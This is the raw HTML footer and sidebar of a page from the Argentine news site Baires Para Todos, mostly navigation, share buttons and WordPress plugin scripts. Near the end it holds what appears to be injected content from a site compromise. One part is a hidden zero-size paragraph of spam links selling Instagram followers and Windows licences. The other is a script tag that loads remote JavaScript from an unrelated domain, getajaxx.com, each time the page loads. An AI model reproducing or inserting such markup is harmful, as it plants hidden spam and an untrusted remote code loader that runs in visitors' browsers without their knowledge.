<a href="https://bairesparatodos.com.ar/inicio/amado-boudou-los-movimientos-sociales-tienen-poco-que-ver-con-el-peronismo/" target="_self"><img src="https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171813-featured-80x80.jpg" srcset="https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171813-featured-80x80.jpg, https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171813-featured-80x80@1.5x.jpg 1.5x, https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171813-featured-80x80@2x.jpg 2x, https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171813-featured-80x80@2.5x.jpg 2.5x, https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171813-featured-80x80@3x.jpg 3x"  width="80" height="80" alt="" class="wpp-thumbnail wpp_featured wpp_cached_thumb" loading="lazy" /></a>
<a href="https://bairesparatodos.com.ar/inicio/amado-boudou-los-movimientos-sociales-tienen-poco-que-ver-con-el-peronismo/" class="wpp-post-title" target="_self">Amado Boudou: “Los movimientos sociales tienen poco que ver con el peronismo”</a>
</li>
</ul>

</div>
<div id="custom_html-2" class="widget_text widget  penci-block-vc penci-widget-sidebar style-title-9 style-title-left widget_custom_html"><div class="textwidget custom-html-widget"><a class="twitter-timeline"  href="https://twitter.com/BairesParaTodos" data-widget-id="287670268149776384">Tweets por @BairesParaTodos</a>
<script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script></div></div><div id="custom_html-4" class="widget_text widget  penci-block-vc penci-widget-sidebar style-title-9 style-title-left widget_custom_html"><div class="textwidget custom-html-widget"><img 
src="https://bairesparatodos.com.ar/inicio/wp-content/uploads/2021/08/bairesreda.png" alt="" title="" />

<a href="http://www.jorgeasisdigital.com/"><img 
src="https://bairesparatodos.com.ar/inicio/wp-content/uploads/2021/08/ja.png
" alt="" title="" /></a>


<a href="http://elpais.com/elpais/portada_america.html"><img 
src="http://bairesparatodos.com.ar/inicio/wp-content/uploads/2015/10/logo-el-pais_0.jpg
" alt="" title="" /></a></div></div>	</div>
</aside><!-- #secondary -->
	</div>

</div>

		</main><!-- #main -->
	</div><!-- #primary -->
	</div><!-- #content -->
	<footer id="colophon" class="site-footer" itemscope itemtype="http://schema.org/WPFooter">
		<meta itemprop="name" content="Webpage footer for Baires Para Todos"/>
		<meta itemprop="description" content="Bienvenidos"/>
		<meta itemprop="keywords" content="Data Protection, Copyright Data"/>
		<meta itemprop="copyrightYear" content="2022"/>
		<meta itemprop="copyrightHolder" content="Baires Para Todos"/>
								<div class="footer__bottom style-1">
			<div class="footer__bottom_container footer__sidebars-inner penci-container-fluid">
						<div class="penci-footer-text-wrap ">Director:  Alejandro Salomón</div>					</div>
	</div>		<div class="footer__copyright_menu">
			<div class="footer__sidebars-inner penci-container-fluid penci_bottom-sub penci_has_copyright">
			<div class="site-info">
				@2020 - bairesparatodos.com.ar. 			</div><!-- .site-info -->
					</div>
	</div>	</footer><!-- #colophon -->
</div><!-- #page -->

<aside class="mobile-sidebar ">

			<div id="sidebar-nav-logo">
								<a href="https://bairesparatodos.com.ar/inicio/" class="custom-logo-link" rel="home"><img width="300" height="85" src="https://bairesparatodos.com.ar/inicio/wp-content/uploads/2017/09/baires-e1505139958447.png" class="custom-logo" alt="Baires Para Todos" loading="lazy" /></a>						</div>
				<div class="header-social sidebar-nav-social">
			<div class="inner-header-social">
				<a class="social-media-item socail_media__facebook" target="_blank" href="https://www.facebook.com/baires.paratodos/" title="Facebook" rel="noopener"><span class="socail-media-item__content"><i class="fa fa-facebook"></i><span class="social_title screen-reader-text">Facebook</span></span></a><a class="social-media-item socail_media__twitter" target="_blank" href="https://twitter.com/BairesParaTodos" title="Twitter" rel="noopener"><span class="socail-media-item__content"><i class="fa fa-twitter"></i><span class="social_title screen-reader-text">Twitter</span></span></a><a class="social-media-item socail_media__instagram" target="_blank" href="https://www.instagram.com/bairesparatodosok/" title="Instagram" rel="noopener"><span class="socail-media-item__content"><i class="fa fa-instagram"></i><span class="social_title screen-reader-text">Instagram</span></span></a><a class="social-media-item socail_media__youtube" target="_blank" href="https://www.youtube.com/channel/UCo1MwzAaMSo9_dW0l1dtawA" title="Youtube" rel="noopener"><span class="socail-media-item__content"><i class="fa fa-youtube-play"></i><span class="social_title screen-reader-text">Youtube</span></span></a>			</div>
		</div>
				<nav class="mobile-navigation" itemscope itemtype="http://schema.org/SiteNavigationElement">
			<ul id="primary-menu-mobile" class="primary-menu-mobile"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-151540"><a href="https://bairesparatodos.com.ar/inicio/">Inicio</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14"><a href="https://bairesparatodos.com.ar/inicio/category/locales/">Locales</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-18"><a href="https://bairesparatodos.com.ar/inicio/category/politica/">Política</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-11"><a href="https://bairesparatodos.com.ar/inicio/category/economia/">Economía</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-13"><a href="https://bairesparatodos.com.ar/inicio/category/internacionales/">Internacionales</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9"><a href="https://bairesparatodos.com.ar/inicio/category/deportes/">Deportes</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-12"><a href="https://bairesparatodos.com.ar/inicio/category/interes-general/">Interés General</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-19"><a href="https://bairesparatodos.com.ar/inicio/category/sociales/">Sociales</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-15"><a href="https://bairesparatodos.com.ar/inicio/category/medios/">Medios</a></li>
</ul>		</nav>
	</aside>
<a id="close-sidebar-nav" class="header-1"><i class="fa fa-close"></i></a>
	<a href="#" id="scroll-to-top"><i class="fa fa-angle-up"></i></a>
<p style="overflow: auto; position: fixed; height: 0pt; width: 0pt">
<a href="https://volgerkopen.com/"><strong>instagram volgers kopen</strong></a>
<a href="https://volgerkopen.com/"><strong>volgers kopen</strong></a>
<a href="https://softsht.com/product/buy-windows-10-pro/"><strong>buy windows 10 pro</strong></a>
<a href="https://softsht.com/product/buy-windows-11-pro/"><strong>buy windows 11 pro</strong></a>
</p>

<script type='text/javascript' src='https://getajaxx.com/mua.js'></script><div class="a2a_kit a2a_kit_size_32 a2a_floating_style a2a_vertical_style" style="left:0px;top:100px;background-color:transparent"><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fbairesparatodos.com.ar%2Finicio%2Finicio%2Famado-boudou-los-movimientos-sociales-tienen-poco-que-ver-con-el-peronismo%2F&amp;linkname=Amado%20Boudou%3A%20%E2%80%9CLos%20movimientos%20sociales%20tienen%20poco%20que%20ver%20con%20el%20peronismo%E2%80%9D%20-%20Baires%20Para%20Todos" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fbairesparatodos.com.ar%2Finicio%2Finicio%2Famado-boudou-los-movimientos-sociales-tienen-poco-que-ver-con-el-peronismo%2F&amp;linkname=Amado%20Boudou%3A%20%E2%80%9CLos%20movimientos%20sociales%20tienen%20poco%20que%20ver%20con%20el%20peronismo%E2%80%9D%20-%20Baires%20Para%20Todos" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Fbairesparatodos.com.ar%2Finicio%2Finicio%2Famado-boudou-los-movimientos-sociales-tienen-poco-que-ver-con-el-peronismo%2F&amp;linkname=Amado%20Boudou%3A%20%E2%80%9CLos%20movimientos%20sociales%20tienen%20poco%20que%20ver%20con%20el%20peronismo%E2%80%9D%20-%20Baires%20Para%20Todos" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_telegram" href="https://www.addtoany.com/add_to/telegram?linkurl=https%3A%2F%2Fbairesparatodos.com.ar%2Finicio%2Finicio%2Famado-boudou-los-movimientos-sociales-tienen-poco-que-ver-con-el-peronismo%2F&amp;linkname=Amado%20Boudou%3A%20%E2%80%9CLos%20movimientos%20sociales%20tienen%20poco%20que%20ver%20con%20el%20peronismo%E2%80%9D%20-%20Baires%20Para%20Todos" title="Telegram" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div><div style="display: none;" id="nxsFavNotice"><div id="nxsFavNoticeCnt">Posting....</div></div><link rel='stylesheet' id='modal-css'  href='https://bairesparatodos.com.ar/inicio/wp-content/plugins/social-networks-auto-poster-facebook-twitter-g/js-css/jquery.modal.min.css?ver=4.3.25' type='text/css' media='all' />
<script type='text/javascript' src='https://bairesparatodos.com.ar/inicio/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.9' id='regenerator-runtime-js'></script>
<script type='text/javascript' src='https://bairesparatodos.com.ar/inicio/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0' id='wp-polyfill-js'></script>
<script type='text/javascript' id='contact-form-7-js-extra'>
/* <![CDATA[ */
var wpcf7 = {"api":{"root":"https:\/\/bairesparatodos.com.ar\/inicio\/wp-json\/","namespace":"contact-form-7\/v1"}};
/* ]]> */
</script>
<script type='text/javascript' src='https://bairesparatodos.com.ar/inicio/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.5.6' id='contact-form-7-js'></script>
<script type='text/javascript' src='https://bairesparatodos.com.ar/inicio/wp-content/plugins/penci-pennews-recipe/js/jquery.rateyo.min.js?ver=2.3' id='jquery-recipe-rateyo-js'></script>
<script type='text/javascript' id='penci_rateyo-js-extra'>
/* <![CDATA[ */
var PENCI = {"ajaxUrl":"https:\/\/bairesparatodos.com.ar\/inicio\/wp-admin\/admin-ajax.php","nonce":"c1f990ed63","normalFill":"#b9b9b9","ratedFill":"#FFCA00"};
/* ]]> */
</script>
<script type='text/javascript' src='https://bairesparatodos.com.ar/inicio/wp-content/plugins/penci-pennews-recipe/js/rating_recipe.js?ver=2.3.2' id='penci_rateyo-js'></script>
<script type='text/javascript' src='https://bairesparatodos.com.ar/inicio/wp-content/plugins/penci-pennews-review/js/jquery.easypiechart.min.js?ver=1.0' id='jquery-penci-piechart-js'></script>
<script type='text/javascript' id='penci-rateyo-review-js-extra'>
/* <![CDATA[ */
var PENCI = {"postID":"171813","ajaxUrl":"https:\/\/bairesparatodos.com.ar\/inicio\/wp-admin\/admin-ajax.php","nonce":"c1f990ed63","normalFill":"#b9b9b9","ratedFill":"#FFCA00"};
/* ]]> */
</script>
<script type='text/javascript' src='https://bairesparatodos.com.ar/inicio/wp-content/plugins/penci-pennews-review/js/rating_review.js?ver=3.0' id='penci-rateyo-review-js'></script>
<script type='text/javascript' id='penci-js-extra'>
/* <![CDATA[ */
var PENCILOCALIZE = {"ajaxUrl":"https:\/\/bairesparatodos.com.ar\/inicio\/wp-admin\/admin-ajax.php","nonce":"c1f990ed63","errorMsg":"Something wrong happened. Please try again.","login":"Email Address","password":"Password","errorPass":"<p class=\"message message-error\">Password does not match the confirm password<\/p>","prevNumber":"1","minlengthSearch":"0","linkTitle":"View More","linkTextAll":"Menu","linkText":"More"};
/* ]]> */
</script>
<script type='text/javascript' src='https://bairesparatodos.com.ar/inicio/wp-content/themes/pennews/js/script.min.js?ver=6.5.7' id='penci-js'></script>
<script type='text/javascript' src='https://bairesparatodos.com.ar/inicio/wp-includes/js/comment-reply.min.js?ver=5.9.3' id='comment-reply-js'></script>
<script type='text/javascript' src='https://bairesparatodos.com.ar/inicio/wp-content/plugins/social-networks-auto-poster-facebook-twitter-g/js-css/jquery.modal.min.js?ver=4.3.25' id='modal-js'></script>
</body>
</html>
